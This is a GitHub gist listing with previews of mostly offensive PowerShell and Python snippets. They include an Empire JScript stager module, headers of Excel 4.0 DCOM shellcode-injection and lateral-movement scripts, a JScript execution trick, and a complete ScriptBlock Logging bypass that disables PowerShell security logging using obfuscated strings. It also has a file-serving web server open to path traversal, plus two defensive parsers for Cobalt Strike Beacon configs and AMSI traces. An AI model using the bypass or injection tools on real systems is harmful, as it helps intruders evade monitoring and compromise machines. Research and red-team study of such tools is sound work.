Skip to content

Instantly share code, notes, and snippets.

Avatar

2XXE GeneralTesler

View GitHub Profile
@infosecn1nja
infosecn1nja / starfighter_js.py
Created Jul 21, 2017
Empire stagers module to generates a .js launcher.
View starfighter_js.py
from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'JS Launcher StarFighter',
'Author': ['Cn33liz'],
View jwtex_test.go
package jwtex
import (
"encoding/base64"
"encoding/json"
"fmt"
"strings"
"testing"
)
@obscuresec
obscuresec / dirtywebserver.ps1
Created May 18, 2014
Dirty PowerShell Webserver
View dirtywebserver.ps1
$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8000/")
$Hso.Start()
While ($Hso.IsListening) {
$HC = $Hso.GetContext()
$HRes = $HC.Response
$HRes.Headers.Add("Content-Type","text/plain")
$Buf = [Text.Encoding]::UTF8.GetBytes((GC (Join-Path $Pwd ($HC.Request).RawUrl)))
$HRes.ContentLength64 = $Buf.Length
$HRes.OutputStream.Write($Buf,0,$Buf.Length)
@jcpowermac
jcpowermac / a_readme.md
Last active Jun 4, 2020
windows kubevirt
View a_readme.md

Windows Image Template

yum install /usr/bin/virt-install virtio-win
virt-install \
  --name 2016 \
 --memory 8192 \
View Invoke-Excel4DCOM64.ps1
#**********************************************************************
# Invoke-Excel4DCOM64.ps1
# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support
# Author: Stan Hegt (@StanHacked) / Outflank, x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason
# Date: 2019/04/21
# Version: 1.1
#**********************************************************************
function Invoke-Excel4DCOM
{
View Invoke-ExShellcode.ps1
<#
Lateral movement and shellcode injection via Excel 4.0 macros
Author: Philip Tsukerman (@PhilipTsukerman)
License: BSD 3-Clause
Based on Invoke-Excel4DCOM by Stan Hegt (@StanHacked) / Outflank - https://github.com/outflanknl/Excel4-DCOM
#>
function Invoke-ExShellcode
{
<#
@gabemarshall
gabemarshall / jscript.ps1
Created Jan 3, 2018
Executing JScript from Powershell via .NET reflection
View jscript.ps1
[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');
$js = 'var js = new ActiveXObject("WScript.Shell");js.Run("calc");'
[Microsoft.JScript.Eval]::JScriptEvaluate($js,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine());
@cobbr
cobbr / ScriptBlockLogBypass.ps1
Last active Sep 19, 2021
ScriptBlock Logging Bypass
View ScriptBlockLogBypass.ps1
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
View beacon.ksy
meta:
id: beaconconfig
title: Cobalt Strike Beacon Config
endian: be
doc: |
Cobalt Strike Beacon is a popular offensive security tool. Beacon itself
is a DLL that gets injected into memory and can be staged from C2 servers.
The Beacon DLL (in unencoded form) contains a configuration section that gets
patched by the C2 server. This section is a fixed predictable structure
@mgraeber-rc
mgraeber-rc / GetAMSIEvent.ps1
Created Oct 8, 2021
A simple AMSI event trace parser
View GetAMSIEvent.ps1
# Author: Matt Graeber
# Company: Red Canary
# To start a trace, run the following from an elevated command prompt: logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets
# To stop the trace, run the following: logman stop AMSITrace -ets
# Example usage: Get-AMSIEvent -Path .\AMSITrace.etl
function Get-AMSIEvent {
param (